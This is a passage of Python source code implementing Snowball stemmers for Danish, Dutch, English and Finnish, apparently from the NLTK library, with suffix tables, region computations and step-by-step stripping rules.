                # Consonant in second position: RV starts after the next vowel.
                for idx in range(2, len(word)):
                    if word[idx] in vowels:
                        rv = word[idx + 1:]
                        break
            elif word[0] in vowels:
                # Two leading vowels: RV starts after the next consonant.
                for idx in range(2, len(word)):
                    if word[idx] not in vowels:
                        rv = word[idx + 1:]
                        break
            else:
                # Consonant + vowel start: RV is simply everything after
                # the third letter.
                rv = word[3:]
        return rv
class DanishStemmer(_ScandinavianStemmer):
    """
    The Danish Snowball stemmer.
    :cvar __vowels: The Danish vowels.
    :type __vowels: unicode
    :cvar __consonants: The Danish consonants.
    :type __consonants: unicode
    :cvar __double_consonants: The Danish double consonants.
    :type __double_consonants: tuple
    :cvar __s_ending: Letters that may directly appear before a word final 's'.
    :type __s_ending: unicode
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :note: A detailed description of the Danish
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/danish/stemmer.html
    """
    # The language's vowels and other important characters are defined.
    __vowels = "aeiouy\xE6\xE5\xF8"
    __consonants = "bcdfghjklmnpqrstvwxz"
    __double_consonants = ("bb", "cc", "dd", "ff", "gg", "hh", "jj",
                           "kk", "ll", "mm", "nn", "pp", "qq", "rr",
                           "ss", "tt", "vv", "ww", "xx", "zz")
    __s_ending = "abcdfghjklmnoprtvyz\xE5"
    # The different suffixes, divided into the algorithm's steps
    # and organized by length, are listed in tuples.
    __step1_suffixes = ("erendes", "erende", "hedens", "ethed",
                        "erede", "heden", "heder", "endes",
                        "ernes", "erens", "erets", "ered",
                        "ende", "erne", "eren", "erer", "heds",
                        "enes", "eres", "eret", "hed", "ene", "ere",
                        "ens", "ers", "ets", "en", "er", "es", "et",
                        "e", "s")
    __step2_suffixes = ("gd", "dt", "gt", "kt")
    __step3_suffixes = ("elig", "l\xF8st", "lig", "els", "ig")
    def stem(self, word):
        """
        Stem a Danish word and return the stemmed form.
        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        # Every word is put into lower case for normalization.
        word = word.lower()
        if word in self.stopwords:
            return word
        # After this, the required regions are generated
        # by the respective helper method.
        r1 = self._r1_scandinavian(word, self.__vowels)
        # Then the actual stemming process starts.
        # Every new step is explicitly indicated
        # according to the descriptions on the Snowball website.
        # STEP 1
        for suffix in self.__step1_suffixes:
            if r1.endswith(suffix):
                if suffix == "s":
                    # A final "s" is only dropped after a valid s-ending letter.
                    if word[-2] in self.__s_ending:
                        word = word[:-1]
                        r1 = r1[:-1]
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                break
        # STEP 2
        # For the clusters gd/dt/gt/kt only the final letter is removed.
        for suffix in self.__step2_suffixes:
            if r1.endswith(suffix):
                word = word[:-1]
                r1 = r1[:-1]
                break
        # STEP 3
        if r1.endswith("igst"):
            word = word[:-2]
            r1 = r1[:-2]
        for suffix in self.__step3_suffixes:
            if r1.endswith(suffix):
                if suffix == "l\xF8st":
                    # "løst" loses only its final "t".
                    word = word[:-1]
                    r1 = r1[:-1]
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                    # After the removal, step 2 is repeated once.
                    if r1.endswith(self.__step2_suffixes):
                        word = word[:-1]
                        r1 = r1[:-1]
                break
        # STEP 4: Undouble
        # A trailing double consonant is reduced to a single one.
        for double_cons in self.__double_consonants:
            if word.endswith(double_cons) and len(word) > 3:
                word = word[:-1]
                break
        return word
class DutchStemmer(_StandardStemmer):
    """
    The Dutch Snowball stemmer.
    :cvar __vowels: The Dutch vowels.
    :type __vowels: unicode
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step3b_suffixes: Suffixes to be deleted in step 3b of the algorithm.
    :type __step3b_suffixes: tuple
    :note: A detailed description of the Dutch
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/dutch/stemmer.html
    """
    __vowels = "aeiouy\xE8"
    __step1_suffixes = ("heden", "ene", "en", "se", "s")
    __step3b_suffixes = ("baar", "lijk", "bar", "end", "ing", "ig")
    def stem(self, word):
        """
        Stem a Dutch word and return the stemmed form.
        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()
        if word in self.stopwords:
            return word
        # Records whether step 2 removed an "e"; step 3b's "bar" rule
        # only fires in that case.
        step2_success = False
        # Vowel accents are removed.
        word = (word.replace("\xE4", "a").replace("\xE1", "a")
                    .replace("\xEB", "e").replace("\xE9", "e")
                    .replace("\xED", "i").replace("\xEF", "i")
                    .replace("\xF6", "o").replace("\xF3", "o")
                    .replace("\xFC", "u").replace("\xFA", "u"))
        # An initial 'y', a 'y' after a vowel,
        # and an 'i' between self.__vowels is put into upper case.
        # As from now these are treated as consonants.
        if word.startswith("y"):
            word = "".join(("Y", word[1:]))
        for i in range(1, len(word)):
            if word[i-1] in self.__vowels and word[i] == "y":
                word = "".join((word[:i], "Y", word[i+1:]))
        for i in range(1, len(word)-1):
            if (word[i-1] in self.__vowels and word[i] == "i" and
               word[i+1] in self.__vowels):
                word = "".join((word[:i], "I", word[i+1:]))
        r1, r2 = self._r1r2_standard(word, self.__vowels)
        # R1 is adjusted so that the region before it
        # contains at least 3 letters.
        for i in range(1, len(word)):
            if word[i] not in self.__vowels and word[i-1] in self.__vowels:
                if len(word[:i+1]) < 3 and len(word[:i+1]) > 0:
                    r1 = word[3:]
                elif len(word[:i+1]) == 0:
                    return word
                break
        # STEP 1
        for suffix in self.__step1_suffixes:
            if r1.endswith(suffix):
                if suffix == "heden":
                    # "heden" is replaced by "heid".
                    word = suffix_replace(word, suffix, "heid")
                    r1 = suffix_replace(r1, suffix, "heid")
                    if r2.endswith("heden"):
                        r2 = suffix_replace(r2, suffix, "heid")
                elif (suffix in ("ene", "en") and
                      not word.endswith("heden") and
                      word[-len(suffix)-1] not in self.__vowels and
                      word[-len(suffix)-3:-len(suffix)] != "gem"):
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    # Undouble a trailing kk/dd/tt after the removal.
                    if word.endswith(("kk", "dd", "tt")):
                        word = word[:-1]
                        r1 = r1[:-1]
                        r2 = r2[:-1]
                elif (suffix in ("se", "s") and
                      word[-len(suffix)-1] not in self.__vowels and
                      word[-len(suffix)-1] != "j"):
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                break
        # STEP 2
        if r1.endswith("e") and word[-2] not in self.__vowels:
            step2_success = True
            word = word[:-1]
            r1 = r1[:-1]
            r2 = r2[:-1]
            if word.endswith(("kk", "dd", "tt")):
                word = word[:-1]
                r1 = r1[:-1]
                r2 = r2[:-1]
        # STEP 3a
        if r2.endswith("heid") and word[-5] != "c":
            word = word[:-4]
            r1 = r1[:-4]
            r2 = r2[:-4]
            if (r1.endswith("en") and word[-3] not in self.__vowels and
                word[-5:-2] != "gem"):
                word = word[:-2]
                r1 = r1[:-2]
                r2 = r2[:-2]
                if word.endswith(("kk", "dd", "tt")):
                    word = word[:-1]
                    r1 = r1[:-1]
                    r2 = r2[:-1]
        # STEP 3b: Derivational suffixes
        for suffix in self.__step3b_suffixes:
            if r2.endswith(suffix):
                if suffix in ("end", "ing"):
                    word = word[:-3]
                    r2 = r2[:-3]
                    if r2.endswith("ig") and word[-3] != "e":
                        word = word[:-2]
                    else:
                        if word.endswith(("kk", "dd", "tt")):
                            word = word[:-1]
                elif suffix == "ig" and word[-3] != "e":
                    word = word[:-2]
                elif suffix == "lijk":
                    word = word[:-4]
                    r1 = r1[:-4]
                    # Repeat step 2 once after removing "lijk".
                    if r1.endswith("e") and word[-2] not in self.__vowels:
                        word = word[:-1]
                        if word.endswith(("kk", "dd", "tt")):
                            word = word[:-1]
                elif suffix == "baar":
                    word = word[:-4]
                elif suffix == "bar" and step2_success:
                    word = word[:-3]
                break
        # STEP 4: Undouble vowel
        # e.g. "loop" -> "lop": aa/ee/oo/uu between consonants is shortened.
        if len(word) >= 4:
            if word[-1] not in self.__vowels and word[-1] != "I":
                if word[-3:-1] in ("aa", "ee", "oo", "uu"):
                    if word[-4] not in self.__vowels:
                        word = "".join((word[:-3], word[-3], word[-1]))
        # All occurrences of 'I' and 'Y' are put back into lower case.
        word = word.replace("I", "i").replace("Y", "y")
        return word
class EnglishStemmer(_StandardStemmer):
    """
    The English Snowball stemmer.
    :cvar __vowels: The English vowels.
    :type __vowels: unicode
    :cvar __double_consonants: The English double consonants.
    :type __double_consonants: tuple
    :cvar __li_ending: Letters that may directly appear before a word final 'li'.
    :type __li_ending: unicode
    :cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
    :type __step0_suffixes: tuple
    :cvar __step1a_suffixes: Suffixes to be deleted in step 1a of the algorithm.
    :type __step1a_suffixes: tuple
    :cvar __step1b_suffixes: Suffixes to be deleted in step 1b of the algorithm.
    :type __step1b_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
    :type __step4_suffixes: tuple
    :cvar __step5_suffixes: Suffixes to be deleted in step 5 of the algorithm.
    :type __step5_suffixes: tuple
    :cvar __special_words: A dictionary containing words
                           which have to be stemmed specially.
    :type __special_words: dict
    :note: A detailed description of the English
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/english/stemmer.html
    """
    __vowels = "aeiouy"
    __double_consonants = ("bb", "dd", "ff", "gg", "mm", "nn",
                           "pp", "rr", "tt")
    __li_ending = "cdeghkmnrt"
    __step0_suffixes = ("'s'", "'s", "'")
    __step1a_suffixes = ("sses", "ied", "ies", "us", "ss", "s")
    __step1b_suffixes = ("eedly", "ingly", "edly", "eed", "ing", "ed")
    __step2_suffixes = ('ization', 'ational', 'fulness', 'ousness',
                        'iveness', 'tional', 'biliti', 'lessli',
                        'entli', 'ation', 'alism', 'aliti', 'ousli',
                        'iviti', 'fulli', 'enci', 'anci', 'abli',
                        'izer', 'ator', 'alli', 'bli', 'ogi', 'li')
    __step3_suffixes = ('ational', 'tional', 'alize', 'icate', 'iciti',
                        'ative', 'ical', 'ness', 'ful')
    __step4_suffixes = ('ement', 'ance', 'ence', 'able', 'ible', 'ment',
                        'ant', 'ent', 'ism', 'ate', 'iti', 'ous',
                        'ive', 'ize', 'ion', 'al', 'er', 'ic')
    __step5_suffixes = ("e", "l")
    # Irregular forms whose stems are fixed by the algorithm, plus words
    # that must be returned unchanged (e.g. "news", "atlas").
    __special_words = {"skis" : "ski",
                       "skies" : "sky",
                       "dying" : "die",
                       "lying" : "lie",
                       "tying" : "tie",
                       "idly" : "idl",
                       "gently" : "gentl",
                       "ugly" : "ugli",
                       "early" : "earli",
                       "only" : "onli",
                       "singly" : "singl",
                       "sky" : "sky",
                       "news" : "news",
                       "howe" : "howe",
                       "atlas" : "atlas",
                       "cosmos" : "cosmos",
                       "bias" : "bias",
                       "andes" : "andes",
                       "inning" : "inning",
                       "innings" : "inning",
                       "outing" : "outing",
                       "outings" : "outing",
                       "canning" : "canning",
                       "cannings" : "canning",
                       "herring" : "herring",
                       "herrings" : "herring",
                       "earring" : "earring",
                       "earrings" : "earring",
                       "proceed" : "proceed",
                       "proceeds" : "proceed",
                       "proceeded" : "proceed",
                       "proceeding" : "proceed",
                       "exceed" : "exceed",
                       "exceeds" : "exceed",
                       "exceeded" : "exceed",
                       "exceeding" : "exceed",
                       "succeed" : "succeed",
                       "succeeds" : "succeed",
                       "succeeded" : "succeed",
                       "succeeding" : "succeed"}
    def stem(self, word):
        """
        Stem an English word and return the stemmed form.
        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()
        if word in self.stopwords or len(word) <= 2:
            return word
        elif word in self.__special_words:
            return self.__special_words[word]
        # Map the different apostrophe characters to a single consistent one
        word = (word.replace("\u2019", "\x27")
                    .replace("\u2018", "\x27")
                    .replace("\u201B", "\x27"))
        if word.startswith("\x27"):
            word = word[1:]
        # A 'y' at the start or after a vowel is treated as a consonant;
        # it is temporarily marked as 'Y' and restored at the end.
        if word.startswith("y"):
            word = "".join(("Y", word[1:]))
        for i in range(1, len(word)):
            if word[i-1] in self.__vowels and word[i] == "y":
                word = "".join((word[:i], "Y", word[i+1:]))
        step1a_vowel_found = False
        step1b_vowel_found = False
        r1 = ""
        r2 = ""
        # Words beginning with these prefixes get a fixed, exceptional R1.
        if word.startswith(("gener", "commun", "arsen")):
            if word.startswith(("gener", "arsen")):
                r1 = word[5:]
            else:
                r1 = word[6:]
            for i in range(1, len(r1)):
                if r1[i] not in self.__vowels and r1[i-1] in self.__vowels:
                    r2 = r1[i+1:]
                    break
        else:
            r1, r2 = self._r1r2_standard(word, self.__vowels)
        # STEP 0
        for suffix in self.__step0_suffixes:
            if word.endswith(suffix):
                word = word[:-len(suffix)]
                r1 = r1[:-len(suffix)]
                r2 = r2[:-len(suffix)]
                break
        # STEP 1a
        for suffix in self.__step1a_suffixes:
            if word.endswith(suffix):
                if suffix == "sses":
                    word = word[:-2]
                    r1 = r1[:-2]
                    r2 = r2[:-2]
                elif suffix in ("ied", "ies"):
                    if len(word[:-len(suffix)]) > 1:
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]
                    else:
                        word = word[:-1]
                        r1 = r1[:-1]
                        r2 = r2[:-1]
                elif suffix == "s":
                    # A final "s" only goes if a vowel precedes its
                    # immediately preceding letter.
                    for letter in word[:-2]:
                        if letter in self.__vowels:
                            step1a_vowel_found = True
                            break
                    if step1a_vowel_found:
                        word = word[:-1]
                        r1 = r1[:-1]
                        r2 = r2[:-1]
                break
        # STEP 1b
        for suffix in self.__step1b_suffixes:
            if word.endswith(suffix):
                if suffix in ("eed", "eedly"):
                    if r1.endswith(suffix):
                        word = suffix_replace(word, suffix, "ee")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "ee")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "ee")
                        else:
                            r2 = ""
                else:
                    for letter in word[:-len(suffix)]:
                        if letter in self.__vowels:
                            step1b_vowel_found = True
                            break
                    if step1b_vowel_found:
                        word = word[:-len(suffix)]
                        r1 = r1[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                        # Restore a final "e" after stripping the
                        # inflection (e.g. "hopping" -> "hop" + undouble).
                        if word.endswith(("at", "bl", "iz")):
                            word = "".join((word, "e"))
                            r1 = "".join((r1, "e"))
                            if len(word) > 5 or len(r1) >=3:
                                r2 = "".join((r2, "e"))
                        elif word.endswith(self.__double_consonants):
                            word = word[:-1]
                            r1 = r1[:-1]
                            r2 = r2[:-1]
                        elif ((r1 == "" and len(word) >= 3 and
                               word[-1] not in self.__vowels and
                               word[-1] not in "wxY" and
                               word[-2] in self.__vowels and
                               word[-3] not in self.__vowels)
                              or
                              (r1 == "" and len(word) == 2 and
                               word[0] in self.__vowels and
                               word[1] not in self.__vowels)):
                            word = "".join((word, "e"))
                            if len(r1) > 0:
                                r1 = "".join((r1, "e"))
                            if len(r2) > 0:
                                r2 = "".join((r2, "e"))
                break
        # STEP 1c
        # Replace a final consonant + y/Y by "i" (e.g. "cry" -> "cri").
        if len(word) > 2 and word[-1] in "yY" and word[-2] not in self.__vowels:
            word = "".join((word[:-1], "i"))
            if len(r1) >= 1:
                r1 = "".join((r1[:-1], "i"))
            else:
                r1 = ""
            if len(r2) >= 1:
                r2 = "".join((r2[:-1], "i"))
            else:
                r2 = ""
        # STEP 2
        for suffix in self.__step2_suffixes:
            if word.endswith(suffix):
                if r1.endswith(suffix):
                    if suffix == "tional":
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]
                    elif suffix in ("enci", "anci", "abli"):
                        word = "".join((word[:-1], "e"))
                        if len(r1) >= 1:
                            r1 = "".join((r1[:-1], "e"))
                        else:
                            r1 = ""
                        if len(r2) >= 1:
                            r2 = "".join((r2[:-1], "e"))
                        else:
                            r2 = ""
                    elif suffix == "entli":
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]
                    elif suffix in ("izer", "ization"):
                        word = suffix_replace(word, suffix, "ize")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "ize")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "ize")
                        else:
                            r2 = ""
                    elif suffix in ("ational", "ation", "ator"):
                        word = suffix_replace(word, suffix, "ate")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "ate")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "ate")
                        else:
                            r2 = "e"
                    elif suffix in ("alism", "aliti", "alli"):
                        word = suffix_replace(word, suffix, "al")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "al")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "al")
                        else:
                            r2 = ""
                    elif suffix == "fulness":
                        word = word[:-4]
                        r1 = r1[:-4]
                        r2 = r2[:-4]
                    elif suffix in ("ousli", "ousness"):
                        word = suffix_replace(word, suffix, "ous")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "ous")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "ous")
                        else:
                            r2 = ""
                    elif suffix in ("iveness", "iviti"):
                        word = suffix_replace(word, suffix, "ive")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "ive")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "ive")
                        else:
                            r2 = "e"
                    elif suffix in ("biliti", "bli"):
                        word = suffix_replace(word, suffix, "ble")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "ble")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "ble")
                        else:
                            r2 = ""
                    elif suffix == "ogi" and word[-4] == "l":
                        word = word[:-1]
                        r1 = r1[:-1]
                        r2 = r2[:-1]
                    elif suffix in ("fulli", "lessli"):
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]
                    elif suffix == "li" and word[-3] in self.__li_ending:
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]
                break
        # STEP 3
        for suffix in self.__step3_suffixes:
            if word.endswith(suffix):
                if r1.endswith(suffix):
                    if suffix == "tional":
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]
                    elif suffix == "ational":
                        word = suffix_replace(word, suffix, "ate")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "ate")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "ate")
                        else:
                            r2 = ""
                    elif suffix == "alize":
                        word = word[:-3]
                        r1 = r1[:-3]
                        r2 = r2[:-3]
                    elif suffix in ("icate", "iciti", "ical"):
                        word = suffix_replace(word, suffix, "ic")
                        if len(r1) >= len(suffix):
                            r1 = suffix_replace(r1, suffix, "ic")
                        else:
                            r1 = ""
                        if len(r2) >= len(suffix):
                            r2 = suffix_replace(r2, suffix, "ic")
                        else:
                            r2 = ""
                    elif suffix in ("ful", "ness"):
                        word = word[:-len(suffix)]
                        r1 = r1[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                    elif suffix == "ative" and r2.endswith(suffix):
                        word = word[:-5]
                        r1 = r1[:-5]
                        r2 = r2[:-5]
                break
        # STEP 4
        for suffix in self.__step4_suffixes:
            if word.endswith(suffix):
                if r2.endswith(suffix):
                    if suffix == "ion":
                        # "ion" is removed only after "s" or "t".
                        if word[-4] in "st":
                            word = word[:-3]
                            r1 = r1[:-3]
                            r2 = r2[:-3]
                    else:
                        word = word[:-len(suffix)]
                        r1 = r1[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                break
        # STEP 5
        if r2.endswith("l") and word[-2] == "l":
            word = word[:-1]
        elif r2.endswith("e"):
            word = word[:-1]
        elif r1.endswith("e"):
            if len(word) >= 4 and (word[-2] in self.__vowels or
                                   word[-2] in "wxY" or
                                   word[-3] not in self.__vowels or
                                   word[-4] in self.__vowels):
                word = word[:-1]
        # Restore any consonant-marked 'Y' to lower case.
        word = word.replace("Y", "y")
        return word
class FinnishStemmer(_StandardStemmer):
    """
    The Finnish Snowball stemmer.

    :cvar __vowels: The Finnish vowels.
    :type __vowels: unicode
    :cvar __restricted_vowels: A subset of the Finnish vowels.
    :type __restricted_vowels: unicode
    :cvar __long_vowels: The Finnish vowels in their long forms.
    :type __long_vowels: tuple
    :cvar __consonants: The Finnish consonants.
    :type __consonants: unicode
    :cvar __double_consonants: The Finnish double consonants.
    :type __double_consonants: tuple
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
    :type __step4_suffixes: tuple
    :note: A detailed description of the Finnish
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/finnish/stemmer.html
    """

    __vowels = "aeiouy\xE4\xF6"
    __restricted_vowels = "aeiou\xE4\xF6"
    __long_vowels = ("aa", "ee", "ii", "oo", "uu", "\xE4\xE4",
                     "\xF6\xF6")
    __consonants = "bcdfghjklmnpqrstvwxz"
    __double_consonants = ("bb", "cc", "dd", "ff", "gg", "hh", "jj",
                           "kk", "ll", "mm", "nn", "pp", "qq", "rr",
                           "ss", "tt", "vv", "ww", "xx", "zz")
    __step1_suffixes = ('kaan', 'k\xE4\xE4n', 'sti', 'kin', 'han',
                        'h\xE4n', 'ko', 'k\xF6', 'pa', 'p\xE4')
    __step2_suffixes = ('nsa', 'ns\xE4', 'mme', 'nne', 'si', 'ni',
                        'an', '\xE4n', 'en')
    __step3_suffixes = ('siin', 'tten', 'seen', 'han', 'hen', 'hin',
                        'hon', 'h\xE4n', 'h\xF6n', 'den', 'tta',
                        'tt\xE4', 'ssa', 'ss\xE4', 'sta',
                        'st\xE4', 'lla', 'll\xE4', 'lta',
                        'lt\xE4', 'lle', 'ksi', 'ine', 'ta',
                        't\xE4', 'na', 'n\xE4', 'a', '\xE4',
                        'n')
    __step4_suffixes = ('impi', 'impa', 'imp\xE4', 'immi', 'imma',
                        'imm\xE4', 'mpi', 'mpa', 'mp\xE4', 'mmi',
                        'mma', 'mm\xE4', 'eja', 'ej\xE4')

    def stem(self, word):
        """
        Stem a Finnish word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        # Step 5 only strips a final i/j when a case ending was actually
        # removed in step 3, so step 3 records its success here.
        step3_success = False

        # R1/R2 are tracked as suffix strings of `word`; every deletion
        # below must shrink word, r1 and r2 by the same amount to keep
        # the regions aligned.
        r1, r2 = self._r1r2_standard(word, self.__vowels)

        # STEP 1: Particles etc.
        for suffix in self.__step1_suffixes:
            if r1.endswith(suffix):
                if suffix == "sti":
                    # 'sti' is removed only if it lies in R2.
                    if suffix in r2:
                        word = word[:-3]
                        r1 = r1[:-3]
                        r2 = r2[:-3]
                else:
                    # Other particles require n, t or a vowel directly
                    # before the suffix.
                    if word[-len(suffix)-1] in "ntaeiouy\xE4\xF6":
                        word = word[:-len(suffix)]
                        r1 = r1[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                break

        # STEP 2: Possessives
        for suffix in self.__step2_suffixes:
            if r1.endswith(suffix):
                if suffix == "si":
                    # 'si' is not removed after 'k' (e.g. -ksi case forms).
                    if word[-3] != "k":
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]

                elif suffix == "ni":
                    word = word[:-2]
                    r1 = r1[:-2]
                    r2 = r2[:-2]

                    # Restore the translative ending: kse -> ksi.
                    if word.endswith("kse"):
                        word = suffix_replace(word, "kse", "ksi")

                    if r1.endswith("kse"):
                        r1 = suffix_replace(r1, "kse", "ksi")

                    if r2.endswith("kse"):
                        r2 = suffix_replace(r2, "kse", "ksi")

                elif suffix == "an":
                    # Removed only after certain case endings (ta/na,
                    # ssa/sta/lla/lta).
                    if (word[-4:-2] in ("ta", "na") or
                            word[-5:-2] in ("ssa", "sta", "lla", "lta")):
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]

                elif suffix == "\xE4n":
                    # Front-vowel counterpart of the 'an' branch above.
                    if (word[-4:-2] in ("t\xE4", "n\xE4") or
                            word[-5:-2] in ("ss\xE4", "st\xE4",
                                            "ll\xE4", "lt\xE4")):
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]

                elif suffix == "en":
                    if word[-5:-2] in ("lle", "ine"):
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]
                else:
                    # Remaining 3-letter possessives (nsa/ns\xE4/mme/nne).
                    word = word[:-3]
                    r1 = r1[:-3]
                    r2 = r2[:-3]
                break

        # STEP 3: Cases
        for suffix in self.__step3_suffixes:
            if r1.endswith(suffix):
                if suffix in ("han", "hen", "hin", "hon", "h\xE4n",
                              "h\xF6n"):
                    # Illative hVn endings are removed only when preceded
                    # by the matching vowel V.
                    if ((suffix == "han" and word[-4] == "a") or
                        (suffix == "hen" and word[-4] == "e") or
                        (suffix == "hin" and word[-4] == "i") or
                        (suffix == "hon" and word[-4] == "o") or
                        (suffix == "h\xE4n" and word[-4] == "\xE4") or
                        (suffix == "h\xF6n" and word[-4] == "\xF6")):
                        word = word[:-3]
                        r1 = r1[:-3]
                        r2 = r2[:-3]
                        step3_success = True

                elif suffix in ("siin", "den", "tten"):
                    # Require Vi before the suffix, V a restricted vowel;
                    # otherwise keep looking for a shorter suffix.
                    if (word[-len(suffix)-1] == "i" and
                            word[-len(suffix)-2] in self.__restricted_vowels):
                        word = word[:-len(suffix)]
                        r1 = r1[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                        step3_success = True
                    else:
                        continue

                elif suffix == "seen":
                    # Only after a long vowel; otherwise try other suffixes.
                    if word[-6:-4] in self.__long_vowels:
                        word = word[:-4]
                        r1 = r1[:-4]
                        r2 = r2[:-4]
                        step3_success = True
                    else:
                        continue

                elif suffix in ("a", "\xE4"):
                    # Single vowel removed only after consonant+vowel.
                    if word[-2] in self.__vowels and word[-3] in self.__consonants:
                        word = word[:-1]
                        r1 = r1[:-1]
                        r2 = r2[:-1]
                        step3_success = True

                elif suffix in ("tta", "tt\xE4"):
                    if word[-4] == "e":
                        word = word[:-3]
                        r1 = r1[:-3]
                        r2 = r2[:-3]
                        step3_success = True

                elif suffix == "n":
                    word = word[:-1]
                    r1 = r1[:-1]
                    r2 = r2[:-1]
                    step3_success = True

                    # After removing 'n', also drop one char of a trailing
                    # 'ie' or long vowel.
                    if word[-2:] == "ie" or word[-2:] in self.__long_vowels:
                        word = word[:-1]
                        r1 = r1[:-1]
                        r2 = r2[:-1]
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    step3_success = True
                break

        # STEP 4: Other endings
        for suffix in self.__step4_suffixes:
            if r2.endswith(suffix):
                if suffix in ("mpi", "mpa", "mp\xE4", "mmi", "mma",
                              "mm\xE4"):
                    # Comparatives are not stripped after 'po'.
                    if word[-5:-3] != "po":
                        word = word[:-3]
                        r1 = r1[:-3]
                        r2 = r2[:-3]
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                break

        # STEP 5: Plurals
        if step3_success and len(r1) >= 1 and r1[-1] in "ij":
            word = word[:-1]
            r1 = r1[:-1]

        elif (not step3_success and len(r1) >= 2 and
              r1[-1] == "t" and r1[-2] in self.__vowels):
            word = word[:-1]
            r1 = r1[:-1]
            r2 = r2[:-1]

            if r2.endswith("imma"):
                word = word[:-4]
                r1 = r1[:-4]
            elif r2.endswith("mma") and r2[-5:-3] != "po":
                word = word[:-3]
                r1 = r1[:-3]

        # STEP 6: Tidying up
        if r1[-2:] in self.__long_vowels:
            word = word[:-1]
            r1 = r1[:-1]

        if (len(r1) >= 2 and r1[-2] in self.__consonants and
                r1[-1] in "a\xE4ei"):
            word = word[:-1]
            r1 = r1[:-1]

        if r1.endswith(("oj", "uj")):
            word = word[:-1]
            r1 = r1[:-1]

        if r1.endswith("jo"):
            word = word[:-1]
            r1 = r1[:-1]

        # If the word ends with a double consonant
        # followed by zero or more vowels, the last consonant is removed.
        for i in range(1, len(word)):
            if word[-i] in self.__vowels:
                continue
            else:
                if i == 1:
                    if word[-i-1:] in self.__double_consonants:
                        word = word[:-1]
                else:
                    if word[-i-1:-i+1] in self.__double_consonants:
                        word = "".join((word[:-i], word[-i+1:]))
                break

        return word
class FrenchStemmer(_StandardStemmer):
    """
    The French Snowball stemmer.

    :cvar __vowels: The French vowels.
    :type __vowels: unicode
